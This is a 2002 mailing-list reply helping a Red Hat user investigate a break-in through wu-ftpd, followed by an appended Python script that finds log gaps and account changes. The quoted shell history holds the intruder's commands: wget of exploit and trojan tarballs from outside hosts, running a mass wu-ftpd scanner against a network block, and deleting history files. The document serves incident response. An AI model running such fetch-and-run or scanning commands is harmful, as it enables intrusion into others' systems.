On Mon, 18 Nov 2002 mails@munshi.dyndns.org wrote:
> Well, I have been hacked and my /var/log/messages has next to nothing

Ok, well first of all, I request that you don't say hacked when you really mean cracked. It's not nice to insult the people whose help you're asking for.

> in it. I am keen on getting to this person who did it. Fortunately I

/var/log/messages will have been cleared up by the cracker, but unless you have backups, I don't think you can get that back.

> (This is the first line)
> Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
> Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
> Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$

Is something missing at the end of the above line? It looks like you've used pico to view the file and the mouse to copy paste. I'd suggest making a copy of /var/log/messages and editing that, and then copy the lines as they are into your mail.

Also, who did the userdel for ftp? Was it you or do you suspect the cracker to have done this?

> The part after 6:24 is proper, but my net wasn't working at that time (this is a normal thing and I do not suspect the hacker to do this, it is a normal thing and happens almost every day, I get logged out from my servers, the network is up but I can't access the internet also).

Do you know why this happens? If not, how long has this been happening? It is possible that you might have had a trojan on your system for quite some time. In that case, unless you have logs from right back then, it will be hard to find out what's happening.

> The .bas* were deleted, but unfortunately for the hacker the .bash_history has some important data there,
>
> cd /dev/ida/.sys/trojan
      ^^^^^^^^^^^^ how long has this been there?

> wget www.geocities.com/master0n/bestwu.tgz
> tar zxvf bestwu.tgz

This is a wu-ftpd exploit script. You really, really, really shouldn't be running wu-ftpd, but, too late now.

My guess is that your wu-ftpd also had anonymous ftp enabled, which is all that's required to get into your system.

Now, the thing about autowu is that it automatically scans a network block and attacks all hosts with port 21 open. Looking at my logs shows many such scans. You might want to look at /var/log/secure - if you have it.

> cd aw
> make
> ./awu 24.132
> cd ..
> lsd
> ls
> rm -rf aw bestwu.tgz
> ls
> wget www.geocities.com/dont_haxer/b.tgz
> tar zxvf b.tgz
> rm -rf b.tgz
> cd .b
> ./bash
> ./bash
> cd /root
> rm -rf .bas*
>
> After that is what I had been doing. So that is the last entry.

Is this your .bash_history or root's? Check root's .bash_history as well.

> So my .bash_profile has been deleted and that is how I came to know that something is wrong, I have not rebooted my system as yet, and do

Have you disconnected from the network? At this moment you could be scanning other people.

> not think it is necessary. A few other things that amaze me here are:
>
> 1. First is the time 2:22am to 6:24am is free, whereas there should have been entries from ddclient, a program that I am running.
> 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history.
> 3. netstat -a, ps ax are not working since the required libraries are not present, so I can't check which ports are open. The error given by netstat -a is
>
> bash# netstat -a
> sh: error in loading shared libraries: libtermcap.so.2: cannot open shared object file: Error 23
> cat: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
> egrep: error in loading shared libraries: libc.so.6: cannot open shared object file: Error 23
> cat: /root/.net: Too many open files in system

/root/.net?

Please run chkrootkit on your system.

You seem to still have some trojaned software around.

> INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet.

ftp was running! That's the main problem.

It's very hard to figure out who's done this without more logging information. Look at /var/log/loginlog, /var/log/secure, /var/log/wtmp

Chances are the cracker missed those files.
Philip
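As an added illustration (not part of the thread above, and not Philip's or the poster's code): a small Python script that does systematically what the two of them are doing by eye, namely parse a syslog-format /var/log/messages, report stretches with no entries at all (the 02:22 to 06:24 silence where ddclient should have been logging), and pull out account-management events such as the userdel of `ftp'. The sample log lines are constructed from the fragments quoted in the mail; the gap threshold, the year, and the list of account-management programs are assumptions. As Philip suggests, run it on a copy of the file, and since the box's own cat/netstat no longer work, run it from a machine whose binaries you trust, passing the path as the first argument.

```python
"""Find silent stretches and account changes in a syslog-style messages file.

Added example, not code from the original thread. Parses the classic
"Mon DD HH:MM:SS host prog[pid]: msg" line format.
"""
import sys
from datetime import datetime

# Constructed sample, built from the fragments quoted in the mail.
SAMPLE_LOG = """\
Nov 18 01:50:11 munshi ddclient[23392]: updating munshi.dyndns.org
Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp'
Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp'
Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyndns.org
Nov 18 06:54:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyndns.org
"""

# Assumed list: programs whose entries mean an account or group was changed.
ACCOUNT_CHANGE_PROGS = {"userdel", "useradd", "usermod", "groupdel", "groupadd"}


def parse_line(line, year=2002):
    """Return (timestamp, host, program, message) or None if the line is not syslog-shaped.

    syslog omits the year; the caller supplies it (2002 for the thread's log).
    """
    parts = line.split(None, 4)          # split() also absorbs the space-padded day
    if len(parts) < 5:
        return None
    mon, day, clock, host, rest = parts
    try:
        ts = datetime.strptime(f"{year} {mon} {day} {clock}", "%Y %b %d %H:%M:%S")
    except ValueError:
        return None
    prog, _, msg = rest.partition(": ")
    prog = prog.split("[", 1)[0]         # drop the "[pid]" suffix
    return ts, host, prog, msg


def find_gaps(text, threshold_minutes=60):
    """Return [(start, end, minutes)] for every stretch with no entries at all.

    A gap only says the daemon was silent or the lines were removed; it does
    not say which, so cross-check against wtmp/secure before drawing conclusions.
    """
    entries = [e for e in (parse_line(l) for l in text.splitlines()) if e]
    gaps = []
    for prev, cur in zip(entries, entries[1:]):
        minutes = (cur[0] - prev[0]).total_seconds() / 60
        if minutes >= threshold_minutes:
            gaps.append((prev[0], cur[0], minutes))
    return gaps


def account_changes(text):
    """Return (timestamp, program, message) for each user/group management entry."""
    found = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry and entry[2] in ACCOUNT_CHANGE_PROGS:
            found.append((entry[0], entry[2], entry[3]))
    return found


if __name__ == "__main__":
    # Pass a path to analyse a copied log; with no argument the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for start, end, mins in find_gaps(text):
        print(f"gap: {start:%b %d %H:%M:%S} -> {end:%b %d %H:%M:%S} ({mins:.0f} min, no entries)")
    for ts, prog, msg in account_changes(text):
        print(f"account change: {ts:%b %d %H:%M:%S} {prog}: {msg}")
```

On the constructed sample this reports one four-hour gap starting right after the two userdel lines and lists both userdel entries, which is exactly the pair of facts the poster noticed: account changes he did not make, followed by silence from a daemon that logs every half hour. Whether the silence is a wiped log or the network outage he describes is something the script cannot decide; that is what the wtmp and secure files Philip points to are for.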